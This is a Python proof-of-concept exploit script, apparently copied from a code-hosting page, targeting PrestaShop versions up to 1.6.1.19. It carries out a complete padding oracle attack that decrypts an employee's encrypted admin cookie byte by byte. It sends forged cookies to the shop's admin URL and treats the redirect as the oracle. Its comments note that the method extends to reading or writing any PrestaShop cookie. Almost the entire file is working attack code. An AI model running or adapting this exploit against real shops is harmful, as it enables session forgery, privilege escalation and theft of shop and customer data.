95 lines
No EOL
2.9 KiB
Python
Executable file
95 lines
No EOL
2.9 KiB
Python
Executable file
#!/usr/bin/env python3
|
|
# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
|
|
# Charles Fol
|
|
#
|
|
# See https://ambionics.io/blog/prestashop-privilege-escalation
|
|
#
|
|
# This POC will reveal the content of an employee's cookie.
|
|
# By modifying it one can read/write any PrestaShop cookie.
|
|
# It is a simple padding oracle implementation.
|
|
#
|
|
|
|
|
|
import requests
|
|
import urllib.parse
|
|
import base64
|
|
|
|
s = requests.Session()
|
|
"""
|
|
s.proxies = {
|
|
'http': 'localhost:8080',
|
|
'https': 'localhost:8080',
|
|
}
|
|
#"""
|
|
|
|
# Login as an employee, get your cookie and paste it here along with the URL
|
|
URL = "http://vmweb5/prestashop/admin177chuncw/"
|
|
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"
|
|
|
|
# Parse blocks and size
|
|
cookie_name, cookie_value = cookie.split("=")
|
|
cookie_value = urllib.parse.unquote(cookie_value)
|
|
cookie_size = cookie_value[-6:]
|
|
cookie_value = cookie_value[:-6]
|
|
cookie_value = base64.b64decode(cookie_value)
|
|
|
|
BLOCK_SIZE = 16
|
|
|
|
def test_padding(data):
|
|
"""Returns true if the padding is correct, false otherwise.
|
|
One can easily adapt it for customer cookies using:
|
|
index.php?controller=identity
|
|
"""
|
|
data = base64.b64encode(data).decode()
|
|
data = urllib.parse.quote(data)
|
|
data = data + cookie_size
|
|
s.cookies[cookie_name] = data
|
|
r = s.get(URL, allow_redirects=False)
|
|
s.cookies.clear()
|
|
return 'AdminLogin' not in r.headers.get('Location', '')
|
|
|
|
def e(msg):
|
|
print(msg)
|
|
exit(1)
|
|
|
|
if not test_padding(cookie_value):
|
|
e("Invalid cookie (1)")
|
|
elif test_padding(b"~~~~~"):
|
|
e("Invalid cookie (2)")
|
|
|
|
# Perform the padding oracle attack
|
|
|
|
result = b''
|
|
|
|
for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
|
|
obtained = []
|
|
current_block = cookie_value[(b ) * BLOCK_SIZE:][:BLOCK_SIZE]
|
|
precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]
|
|
|
|
for p in range(BLOCK_SIZE):
|
|
nb_obtained = len(obtained)
|
|
|
|
for i in range(256):
|
|
pad = nb_obtained + 1
|
|
|
|
prelude = (
|
|
b"\x00" * (BLOCK_SIZE - pad) +
|
|
bytes([i]) +
|
|
bytes([o ^ pad for o in obtained][::-1])
|
|
)
|
|
data = cookie_value + prelude + current_block
|
|
|
|
if test_padding(data):
|
|
print("Got byte #%d of block #%d: %d" % (p, b, i))
|
|
obtained.append(i ^ pad)
|
|
break
|
|
else:
|
|
e("Unable to decode position %d" % p)
|
|
|
|
# Compute the contents of the plaintext block
|
|
|
|
result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
|
|
try:
|
|
print("COOKIE: %s" % result.decode())
|
|
except UnicodeDecodeError:
|
|
print("COOKIE: Unable to decode, wait for next block") |